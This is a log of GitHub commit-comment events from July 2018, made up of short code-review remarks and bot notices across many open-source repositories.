{"id":"8018852563","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29835073,"position":111,"line":100,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T20:30:11Z","updated_at":"2018-07-25T20:30:11Z","author_association":"OWNER","body":"mmm...I will try, but I think it will not work because I am calling this function with statements like the following:\r\n`compareStrings(game.commits[0].status,'D'`\r\n\r\nwhere status is a bytes32 and 'D' is a string."}},"created_at":"2018-07-25T20:30:11Z"}
{"id":"8018856847","type":"CommitCommentEvent","actor":{"login":"lgtyqz"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29835082,"position":null,"line":null,"path":null,"commit_id":"868a5c2b66e8625fc12b60823986776b45f48f39","created_at":"2018-07-25T20:31:00Z","updated_at":"2018-07-25T20:31:00Z","author_association":"CONTRIBUTOR","body":"The .jar is in there, and the classpath opens it correctly, but the _real_ problem is that\r\n`Could not load resources/pyAI.py`\r\n\r\nThe rest of the console output goes\r\n`Loading Python Interpreter...`\r\n`Python Interpreter Ready`\r\n`Compiling script...`\r\n`java.lang.NullPointerException`"}},"created_at":"2018-07-25T20:31:00Z"}
{"id":"8018857987","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29835084,"position":null,"line":null,"path":null,"commit_id":"b4bfdad307607504283a57668ab86f7c398e96b8","created_at":"2018-07-25T20:31:15Z","updated_at":"2018-07-25T20:31:15Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-1046](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-1046).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1046-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-25T20:31:15Z"}
{"id":"8018858763","type":"CommitCommentEvent","actor":{"login":"ycho"},"repo":{"name":"xiph/rav1e"},"payload":{"comment":{"id":29835086,"position":13,"line":38,"path":"src/bin/rav1e.rs","commit_id":"a79d08f6e67595d09f0b801f245ce24b33103686","created_at":"2018-07-25T20:31:24Z","updated_at":"2018-07-25T20:31:24Z","author_association":"COLLABORATOR","body":"Oh.. sorry I've already merged this patch."}},"created_at":"2018-07-25T20:31:24Z"}
{"id":"8018864770","type":"CommitCommentEvent","actor":{"login":"tpope"},"repo":{"name":"tpope/vim-fugitive"},"payload":{"comment":{"id":29835101,"position":null,"line":null,"path":null,"commit_id":"73c39195aee0c80f9ef3cd433ee315d72931864e","created_at":"2018-07-25T20:32:37Z","updated_at":"2018-07-25T20:32:37Z","author_association":"OWNER","body":"Thanks!"}},"created_at":"2018-07-25T20:32:37Z"}
{"id":"8018867218","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29835106,"position":null,"line":null,"path":null,"commit_id":"8c6a38ae74be4ac99056e05742d42148e0b3206c","created_at":"2018-07-25T20:33:06Z","updated_at":"2018-07-25T20:33:06Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-MacOS-10.9-clang: OK (2943 of 2946 tests passed, 9 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 2 tests had: ERR diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: Table big diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 620\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c6a38ae74be4ac99056e05742d42148e0b3206c-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c6a38ae74be4ac99056e05742d42148e0b3206c-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-25T20:33:06Z"}
{"id":"8018867881","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29835107,"position":114,"line":103,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T20:33:14Z","updated_at":"2018-07-25T20:33:14Z","author_association":"OWNER","body":"`revealFinished()` will eventually return `true` when time runs out, allowing the other player win the game."}},"created_at":"2018-07-25T20:33:14Z"}
{"id":"8018870352","type":"CommitCommentEvent","actor":{"login":"gabriel-lima"},"repo":{"name":"gabriel-lima/thinking-in-react-example"},"payload":{"comment":{"id":29835116,"position":97,"line":97,"path":"src/index.js","commit_id":"e0e39291471d81e1219ec2ea92f14cb2b09463b2","created_at":"2018-07-25T20:33:44Z","updated_at":"2018-07-25T20:33:44Z","author_association":"OWNER","body":"I've needed to know if the key pressed was \"Enter\". "}},"created_at":"2018-07-25T20:33:44Z"}
{"id":"8018871077","type":"CommitCommentEvent","actor":{"login":"erictraut"},"repo":{"name":"Microsoft/reactxp"},"payload":{"comment":{"id":29835117,"position":null,"line":null,"path":null,"commit_id":"2f783b8d8f9e9afe52d00c9cbf4a8bc2a2288ecc","created_at":"2018-07-25T20:33:53Z","updated_at":"2018-07-25T20:33:53Z","author_association":"MEMBER","body":"Hmm, I didn't notice the timestamp. I assume that it was npm, but I don't recall ever seeing a version with a timestamp."}},"created_at":"2018-07-25T20:33:53Z"}
{"id":"8018874974","type":"CommitCommentEvent","actor":{"login":"gabriel-lima"},"repo":{"name":"gabriel-lima/thinking-in-react-example"},"payload":{"comment":{"id":29835124,"position":126,"line":126,"path":"src/index.js","commit_id":"e0e39291471d81e1219ec2ea92f14cb2b09463b2","created_at":"2018-07-25T20:34:42Z","updated_at":"2018-07-25T20:34:42Z","author_association":"OWNER","body":"Why is it necessary?"}},"created_at":"2018-07-25T20:34:42Z"}
{"id":"8018875041","type":"CommitCommentEvent","actor":{"login":"Xaratas"},"repo":{"name":"Xaratas/pillarsofeternity-2-german-patch"},"payload":{"comment":{"id":29835125,"position":158,"line":null,"path":"exported/localized/de_patch/text/game/abilities.stringtable","commit_id":"1b17f216f1ab93d4a864292d8643159c5204a0df","created_at":"2018-07-25T20:34:43Z","updated_at":"2018-07-25T20:34:43Z","author_association":"OWNER","body":"Eventuell, aber wer weiß schon, ob sich das auf Personen oder Schiffe bezieht."}},"created_at":"2018-07-25T20:34:43Z"}
{"id":"8018875261","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29835127,"position":50,"line":55,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T20:34:46Z","updated_at":"2018-07-25T20:34:46Z","author_association":"OWNER","body":"I wanted to make sure there would be some third party that would collect the wagers if players fail to validate their choices. Later on in the contract I use `owner` for that purpose."}},"created_at":"2018-07-25T20:34:46Z"}
{"id":"8018881028","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29835137,"position":61,"line":64,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T20:35:58Z","updated_at":"2018-07-25T20:35:58Z","author_association":"OWNER","body":"One can only can reveal if the game time is up. (or both players have declared their commit)."}},"created_at":"2018-07-25T20:35:58Z"}
{"id":"8018882445","type":"CommitCommentEvent","actor":{"login":"gabriel-lima"},"repo":{"name":"gabriel-lima/thinking-in-react-example"},"payload":{"comment":{"id":29835142,"position":153,"line":153,"path":"src/index.js","commit_id":"e0e39291471d81e1219ec2ea92f14cb2b09463b2","created_at":"2018-07-25T20:36:15Z","updated_at":"2018-07-25T20:36:15Z","author_association":"OWNER","body":"Yeah, I assumed that. During I was writing this code I was aware of it. I've forgotten to handle this data. I'll change this."}},"created_at":"2018-07-25T20:36:15Z"}
{"id":"8018883977","type":"CommitCommentEvent","actor":{"login":"bumbadadabum"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":29835150,"position":4,"line":615,"path":"users.js","commit_id":"39606a179b6ae5dc9c8bbc7bb0858fe94f1b051c","created_at":"2018-07-25T20:36:35Z","updated_at":"2018-07-25T20:36:35Z","author_association":"COLLABORATOR","body":"This isn't really a policy change in the first place since leaders could\npromote themselves to roomowner in private rooms to get all these\npermissions. It's a quality of life change. Sorry that I didn't involve you\nbut I really didn't see the necessity.\n"}},"created_at":"2018-07-25T20:36:35Z"}
{"id":"8018884285","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29835151,"position":null,"line":null,"path":null,"commit_id":"523450d3c2a924c51963494cd7b55f3114d1b058","created_at":"2018-07-25T20:36:38Z","updated_at":"2018-07-25T20:36:38Z","author_association":"OWNER","body":"Wow. . even a blind squirrel finds a nut once in a while."}},"created_at":"2018-07-25T20:36:38Z"}
{"id":"8018885060","type":"CommitCommentEvent","actor":{"login":"goldfirere"},"repo":{"name":"matthew-yacavone/haddock"},"payload":{"comment":{"id":29835155,"position":5,"line":117,"path":"haddock-api/src/Haddock/Convert.hs","commit_id":"f487b6bddb2f93dcf4cc79a73cf6b18fbc898e02","created_at":"2018-07-25T20:36:48Z","updated_at":"2018-07-25T20:36:48Z","author_association":"NONE","body":"This is sensible (as I implied in my last comment on the topic), but I would still keep this to Nothing for now. Unless you also want to update the parts of haddock that render this information."}},"created_at":"2018-07-25T20:36:48Z"}
{"id":"8018885888","type":"CommitCommentEvent","actor":{"login":"clawrk"},"repo":{"name":"clawrk/personal-assist"},"payload":{"comment":{"id":29835157,"position":null,"line":null,"path":null,"commit_id":"31caf0ac6c98c7ad0a483247134da26ca6ae4567","created_at":"2018-07-25T20:36:59Z","updated_at":"2018-07-25T20:36:59Z","author_association":"OWNER","body":"BFS code"}},"created_at":"2018-07-25T20:36:59Z"}
{"id":"8018886277","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29835158,"position":64,"line":67,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T20:37:04Z","updated_at":"2018-07-25T20:37:04Z","author_association":"OWNER","body":"Good point. Hadn't thought of that."}},"created_at":"2018-07-25T20:37:04Z"}
{"id":"8018888118","type":"CommitCommentEvent","actor":{"login":"MaxBazarov"},"repo":{"name":"MaxBazarov/exporter"},"payload":{"comment":{"id":29835167,"position":null,"line":null,"path":null,"commit_id":"9851093614f4d4eac955f0a2abff3fa1aca79c5d","created_at":"2018-07-25T20:37:27Z","updated_at":"2018-07-25T20:37:27Z","author_association":"OWNER","body":"Deal\n\n> On 25 Jul 2018, at 23:16, cpshanley <notifications@github.com> wrote:\n> \n> Brilliant. Top man.\n> Overlays after that, I hope!\n> All the best, Colin.\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/MaxBazarov/exporter/commit/9851093614f4d4eac955f0a2abff3fa1aca79c5d#commitcomment-29834917>, or mute the thread <https://github.com/notifications/unsubscribe-auth/ARkKgqiprndQ-aP50eWGJO-r3y8BwC9Yks5uKNINgaJpZM4VgkS9>.\n> \n\n"}},"created_at":"2018-07-25T20:37:27Z"}
{"id":"8018888138","type":"CommitCommentEvent","actor":{"login":"tinavaz"},"repo":{"name":"CGAL/cgal-public-dev"},"payload":{"comment":{"id":29835168,"position":2,"line":2,"path":"Heat_method_3/test/Heat_method_3/data/sphere.src","commit_id":"e8ba3724bbc95b3f5861ded49b74aa8a05043cc0","created_at":"2018-07-25T20:37:28Z","updated_at":"2018-07-25T20:37:28Z","author_association":"NONE","body":"The sphere.dists file was created using only 0 as the source. I can re-run it and add 13 to the source set though"}},"created_at":"2018-07-25T20:37:28Z"}
{"id":"8018891142","type":"CommitCommentEvent","actor":{"login":"jstvz"},"repo":{"name":"SalesforceFoundation/HEDAP"},"payload":{"comment":{"id":29835184,"position":23,"line":274,"path":"src/labels/CustomLabels.labels","commit_id":"8a02f5b11dee7cbab15e74da075c3a39390b787c","created_at":"2018-07-25T20:38:04Z","updated_at":"2018-07-25T20:38:04Z","author_association":"MEMBER","body":"@xinnanlisf I think this is the offending line."}},"created_at":"2018-07-25T20:38:04Z"}
{"id":"8018891797","type":"CommitCommentEvent","actor":{"login":"bgarrant"},"repo":{"name":"Kronuz/LSP"},"payload":{"comment":{"id":29835185,"position":null,"line":null,"path":null,"commit_id":"d738e87ca0fe5e2a9ea1c1830e69462c296a6f68","created_at":"2018-07-25T20:38:13Z","updated_at":"2018-07-25T20:38:13Z","author_association":"NONE","body":"This is not working with Sass.  For some reason it treats it as SCSS.\r\n\r\n```\r\n        \"sass\": {\r\n          \"scopes\": [\"source.sass\"],\r\n          \"syntaxes\": [\"sass\"]\r\n        },\r\n```\r\n\r\nThe syntax shows on mine Packages/Sass/Syntaxes/Sass.sublime-syntax and the scope is source.sass.  I am wondering is the scope should be source.css.sass?\r\n"}},"created_at":"2018-07-25T20:38:13Z"}
{"id":"8018892621","type":"CommitCommentEvent","actor":{"login":"gabriel-lima"},"repo":{"name":"gabriel-lima/thinking-in-react-example"},"payload":{"comment":{"id":29835188,"position":97,"line":97,"path":"src/index.js","commit_id":"e0e39291471d81e1219ec2ea92f14cb2b09463b2","created_at":"2018-07-25T20:38:22Z","updated_at":"2018-07-25T20:38:22Z","author_association":"OWNER","body":"Is there another option to do this?"}},"created_at":"2018-07-25T20:38:22Z"}
{"id":"8018895554","type":"CommitCommentEvent","actor":{"login":"gabriel-lima"},"repo":{"name":"gabriel-lima/thinking-in-react-example"},"payload":{"comment":{"id":29835194,"position":117,"line":117,"path":"src/index.js","commit_id":"e0e39291471d81e1219ec2ea92f14cb2b09463b2","created_at":"2018-07-25T20:38:59Z","updated_at":"2018-07-25T20:38:59Z","author_association":"OWNER","body":"Right, I agree."}},"created_at":"2018-07-25T20:38:59Z"}
{"id":"8018895660","type":"CommitCommentEvent","actor":{"login":"cpshanley"},"repo":{"name":"MaxBazarov/exporter"},"payload":{"comment":{"id":29835195,"position":null,"line":null,"path":null,"commit_id":"9851093614f4d4eac955f0a2abff3fa1aca79c5d","created_at":"2018-07-25T20:39:01Z","updated_at":"2018-07-25T20:39:01Z","author_association":"NONE","body":"Coolio.\r\n\r\nAnd if you want something you can monetise, start thinking about a wrapper that can run on iOS and Android!\r\n\r\nCin cin"}},"created_at":"2018-07-25T20:39:01Z"}
{"id":"8018895978","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29835196,"position":null,"line":null,"path":null,"commit_id":"f39b6fac4e5c3fc9c111936b936c3a84d8cadad7","created_at":"2018-07-25T20:39:04Z","updated_at":"2018-07-25T20:39:04Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-394](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-394).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-394-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-25T20:39:04Z"}
{"id":"8018896904","type":"CommitCommentEvent","actor":{"login":"vovkasm"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29835199,"position":null,"line":null,"path":null,"commit_id":"44734a28a1e75a8a3558d8b2ab5c9947d30f4923","created_at":"2018-07-25T20:39:16Z","updated_at":"2018-07-25T20:39:16Z","author_association":"NONE","body":"What is this? )))"}},"created_at":"2018-07-25T20:39:16Z"}
{"id":"8018900544","type":"CommitCommentEvent","actor":{"login":"gabriel-lima"},"repo":{"name":"gabriel-lima/thinking-in-react-example"},"payload":{"comment":{"id":29835205,"position":126,"line":126,"path":"src/index.js","commit_id":"e0e39291471d81e1219ec2ea92f14cb2b09463b2","created_at":"2018-07-25T20:39:59Z","updated_at":"2018-07-25T20:39:59Z","author_association":"OWNER","body":"Which occasion is it necessary to sync that data?"}},"created_at":"2018-07-25T20:39:59Z"}
{"id":"8018903385","type":"CommitCommentEvent","actor":{"login":"leobalter"},"repo":{"name":"bterlson/test262-harness"},"payload":{"comment":{"id":29835217,"position":5,"line":44,"path":"lib/validator.js","commit_id":"9c3a90071e68d783f1bfbc600ae7579c9a665618","created_at":"2018-07-25T20:40:32Z","updated_at":"2018-07-25T20:40:32Z","author_association":"CONTRIBUTOR","body":"nit: line 43 to `else if`?"}},"created_at":"2018-07-25T20:40:32Z"}
{"id":"8018904135","type":"CommitCommentEvent","actor":{"login":"ejhuff"},"repo":{"name":"golang/go"},"payload":{"comment":{"id":29835222,"position":278,"line":164,"path":"src/unicode/utf8/utf8.go","commit_id":"bf5b4e71be59d90f35a571a644e5731c581e9f6c","created_at":"2018-07-25T20:40:41Z","updated_at":"2018-07-25T20:40:41Z","author_association":"NONE","body":"Create 0x00000000 or 0xFFFFFFFF."}},"created_at":"2018-07-25T20:40:41Z"}
{"id":"8018904862","type":"CommitCommentEvent","actor":{"login":"denysvitali"},"repo":{"name":"denysvitali/blurz"},"payload":{"comment":{"id":29835224,"position":24,"line":157,"path":"src/bluetooth_gatt_characteristic.rs","commit_id":"ba6c9d4cad456dcdb3167684086bd7652d109e7f","created_at":"2018-07-25T20:40:50Z","updated_at":"2018-07-25T20:40:50Z","author_association":"OWNER","body":"It doesn't seem to work:\r\n```\r\n157 |         func(opt_mtu?, opt_fd?);\r\n        |                 ^^^^^^^^ the trait `std::error::Error` is not implemented for `std::option::NoneError`\r\n```"}},"created_at":"2018-07-25T20:40:50Z"}
{"id":"8018905510","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Piyush3079/phpmyadmin"},"payload":{"comment":{"id":29835226,"position":null,"line":null,"path":null,"commit_id":"c966ea856f768a8436d0bf50f98f718aa753a5de","created_at":"2018-07-25T20:40:58Z","updated_at":"2018-07-25T20:40:58Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: js/src/common_params.php, js/src/messages.php"}},"created_at":"2018-07-25T20:40:58Z"}
{"id":"8018905691","type":"CommitCommentEvent","actor":{"login":"gabriel-lima"},"repo":{"name":"gabriel-lima/thinking-in-react-example"},"payload":{"comment":{"id":29835229,"position":172,"line":172,"path":"src/index.js","commit_id":"e0e39291471d81e1219ec2ea92f14cb2b09463b2","created_at":"2018-07-25T20:41:00Z","updated_at":"2018-07-25T20:41:00Z","author_association":"OWNER","body":"Sorry man, I didn't get it. "}},"created_at":"2018-07-25T20:41:00Z"}
{"id":"8018907878","type":"CommitCommentEvent","actor":{"login":"ejhuff"},"repo":{"name":"golang/"},"payload":{"comment":{"id":29835234,"position":279,"line":165,"path":"src/unicode/utf8/utf8.go","commit_id":"bf5b4e71be59d90f35a571a644e5731c581e9f6c","created_at":"2018-07-25T20:41:28Z","updated_at":"2018-07-25T20:41:28Z","author_association":"NONE","body":"return rune(p0)&^mask | RuneError&mask, 1"}},"created_at":"2018-07-25T20:41:28Z"}
{"id":"8018907878","type":"CommitCommentEvent","actor":{"login":"ejhuff"},"repo":{"name":"golang/"},"payload":{"comment":{"id":29835234,"position":279,"line":165,"path":"src/unicode/utf8/utf8.go","commit_id":"bf5b4e71be59d90f35a571a644e5731c581e9f6c","created_at":"2018-07-25T20:41:28Z","updated_at":"2018-07-25T20:41:28Z","author_association":"NONE","body":"return rune(p0)&^mask | RuneError&mask, 1"}},"created_at":"2018-07-25T20:41:28Z"}
{"id":"8018908739","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29835236,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-25T20:41:38Z","updated_at":"2018-07-25T20:41:38Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-25T20:41:38Z"}
{"id":"8018909728","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29835239,"position":null,"line":null,"path":null,"commit_id":"6c21984c5b86ca03c72a88927f8c1de0c420e25f","created_at":"2018-07-25T20:41:50Z","updated_at":"2018-07-25T20:41:50Z","author_association":"MEMBER","body":"> You had your time to review it earlier, why did you not comment back then?\r\n\r\nBecause I don't have time and energy to review all PRs, obviously. I've been doing most of the reviews earlier, so it's unfair from you to saying this.\r\n\r\n> ...it is testing repository. The requirements are not the same there as for main and community. \r\n\r\nThis is not an excuse and it doesn't make sense. Who will fix aports when moving from testing to community/main? Who actually do review aports when moving between repos? How you can teach contributors how to make better aports with this policy? Quite doesn't make sense, don't you think?\r\n\r\n>  Instead of whining, please submit a commit that fixes all the problems you found. Thank you.\r\n\r\nInstead of whining?! You did a mistake and you blame me?! And I should now fix the stuff you skipped? No, I can't do this all the time. I just reverted the commit this time. Please fix the issues and do a better review next time. Thank you."}},"created_at":"2018-07-25T20:41:50Z"}
{"id":"8018912517","type":"CommitCommentEvent","actor":{"login":"AndrewJLowery"},"repo":{"name":"AndrewJLowery/hello-world"},"payload":{"comment":{"id":29835241,"position":null,"line":null,"path":null,"commit_id":"ce66919ad7bbc973abddde2a3e525fbc382f35a0","created_at":"2018-07-25T20:42:22Z","updated_at":"2018-07-25T20:42:22Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-25T20:42:22Z"}
{"id":"8018912668","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29835242,"position":99,"line":91,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T20:42:24Z","updated_at":"2018-07-25T20:42:24Z","author_association":"OWNER","body":"Yes, I should have done that.\r\nD: is for Declare. \r\nV: is verified. Players can only verify once the game is finished. The game is finishes when both players have status D or the time is up.\r\nFor a player to win , they need to reach status V . which means that you 1 - have sent your move before end time and 2 - you have validated before \"end reveal\" time.\r\nThere is also status P, which applies only when there is a draw, to track players claiming back their wagers."}},"created_at":"2018-07-25T20:42:24Z"}
{"id":"8018913234","type":"CommitCommentEvent","actor":{"login":"Lucatrio"},"repo":{"name":"Lucatrio/garrix-project_beta"},"payload":{"comment":{"id":29835247,"position":null,"line":null,"path":null,"commit_id":"93b38c46123edb8839a6df228a5a2ccd25b18977","created_at":"2018-07-25T20:42:30Z","updated_at":"2018-07-25T20:42:30Z","author_association":"OWNER","body":"mhm decent but I like the mention more."}},"created_at":"2018-07-25T20:42:30Z"}
{"id":"8018914834","type":"CommitCommentEvent","actor":{"login":"renderorange"},"repo":{"name":"renderorange/daily_book"},"payload":{"comment":{"id":29835250,"position":null,"line":null,"path":null,"commit_id":"318b8a70cc28ae69ded02793c6e34b98fd9fa1d1","created_at":"2018-07-25T20:42:51Z","updated_at":"2018-07-25T20:42:51Z","author_association":"OWNER","body":"I wonder if the last issue was only temporary, and then was reverted back to include the gutenberg path."}},"created_at":"2018-07-25T20:42:51Z"}
{"id":"8018915190","type":"CommitCommentEvent","actor":{"login":"gabriel-lima"},"repo":{"name":"gabriel-lima/thinking-in-react-example"},"payload":{"comment":{"id":29835252,"position":177,"line":177,"path":"src/index.js","commit_id":"e0e39291471d81e1219ec2ea92f14cb2b09463b2","created_at":"2018-07-25T20:42:56Z","updated_at":"2018-07-25T20:42:56Z","author_association":"OWNER","body":"I don't know. Do you have a suggestion by that? Can I extract to another component?"}},"created_at":"2018-07-25T20:42:56Z"}
{"id":"8018918898","type":"CommitCommentEvent","actor":{"login":"rwaldron"},"repo":{"name":"bterlson/test262-harness"},"payload":{"comment":{"id":29835255,"position":5,"line":44,"path":"lib/validator.js","commit_id":"9c3a90071e68d783f1bfbc600ae7579c9a665618","created_at":"2018-07-25T20:43:42Z","updated_at":"2018-07-25T20:43:42Z","author_association":"COLLABORATOR","body":"Sure"}},"created_at":"2018-07-25T20:43:42Z"}
{"id":"8018922301","type":"CommitCommentEvent","actor":{"login":"neikeq"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":29835271,"position":null,"line":null,"path":null,"commit_id":"8edf85b09c014bee48adcc515a46cf315ef393f5","created_at":"2018-07-25T20:44:25Z","updated_at":"2018-07-25T20:44:25Z","author_association":"MEMBER","body":"Damn, this introduced a regression. Trying to fix it..."}},"created_at":"2018-07-25T20:44:25Z"}
{"id":"8018926974","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29835280,"position":null,"line":null,"path":null,"commit_id":"20463abcc21470e436c2bb03897c96aac1a9d661","created_at":"2018-07-25T20:45:22Z","updated_at":"2018-07-25T20:45:22Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/20463abcc21470e436c2bb03897c96aac1a9d661/index.html"}},"created_at":"2018-07-25T20:45:22Z"}
{"id":"8018927830","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29835284,"position":null,"line":null,"path":null,"commit_id":"34131b27603292fdfe67812b5c783db2fd8ca94d","created_at":"2018-07-25T20:45:33Z","updated_at":"2018-07-25T20:45:33Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-396](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-396).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-396-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-25T20:45:33Z"}
{"id":"8018928120","type":"CommitCommentEvent","actor":{"login":"fidelisojeah"},"repo":{"name":"supershegs/MyDiary"},"payload":{"comment":{"id":29835288,"position":41,"line":31,"path":"server/model/EntriesModel.js","commit_id":"ff292915fff49a04b9fd75263ec7da6c89075891","created_at":"2018-07-25T20:45:37Z","updated_at":"2018-07-25T20:45:37Z","author_association":"NONE","body":"Try to use ES6 array iterators whenever possible"}},"created_at":"2018-07-25T20:45:37Z"}
{"id":"8018929385","type":"CommitCommentEvent","actor":{"login":"venkatmalapati1"},"repo":{"name":"venkatmalapati1/fast-track"},"payload":{"comment":{"id":29835291,"position":null,"line":null,"path":null,"commit_id":"ef4927129f7020ad5b57418a33a4c311fec682ec","created_at":"2018-07-25T20:45:52Z","updated_at":"2018-07-25T20:45:52Z","author_association":"OWNER","body":"why "}},"created_at":"2018-07-25T20:45:52Z"}
{"id":"8018930447","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29835293,"position":null,"line":null,"path":null,"commit_id":"523450d3c2a924c51963494cd7b55f3114d1b058","created_at":"2018-07-25T20:46:05Z","updated_at":"2018-07-25T20:46:05Z","author_association":"NONE","body":"Congratulations, from another squirrel feeling blind ;-)"}},"created_at":"2018-07-25T20:46:05Z"}
{"id":"8018930596","type":"CommitCommentEvent","actor":{"login":"venkatmalapati1"},"repo":{"name":"venkatmalapati1/fast-track"},"payload":{"comment":{"id":29835294,"position":null,"line":null,"path":null,"commit_id":"ef4927129f7020ad5b57418a33a4c311fec682ec","created_at":"2018-07-25T20:46:07Z","updated_at":"2018-07-25T20:46:07Z","author_association":"OWNER","body":"i want this gem"}},"created_at":"2018-07-25T20:46:07Z"}
{"id":"8018930705","type":"CommitCommentEvent","actor":{"login":"fidelisojeah"},"repo":{"name":"supershegs/MyDiary"},"payload":{"comment":{"id":29835295,"position":56,"line":40,"path":"server/model/EntriesModel.js","commit_id":"ff292915fff49a04b9fd75263ec7da6c89075891","created_at":"2018-07-25T20:46:08Z","updated_at":"2018-07-25T20:46:08Z","author_association":"NONE","body":"Try to use ES6 array iterators whenever possible"}},"created_at":"2018-07-25T20:46:08Z"}
{"id":"8018932160","type":"CommitCommentEvent","actor":{"login":"dpardo07"},"repo":{"name":"dpardo07/keyNTN24"},"payload":{"comment":{"id":29835300,"position":null,"line":null,"path":null,"commit_id":"9191df3c69f2232a41431939e448303aa66acc49","created_at":"2018-07-25T20:46:25Z","updated_at":"2018-07-25T20:46:25Z","author_association":"OWNER","body":"no se necesita"}},"created_at":"2018-07-25T20:46:25Z"}
{"id":"8018937120","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29835308,"position":null,"line":null,"path":null,"commit_id":"59718fca1b405227a2793e2d77db1896dba76424","created_at":"2018-07-25T20:47:24Z","updated_at":"2018-07-25T20:47:24Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#pr-46](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#pr-46).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-46-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-25T20:47:24Z"}
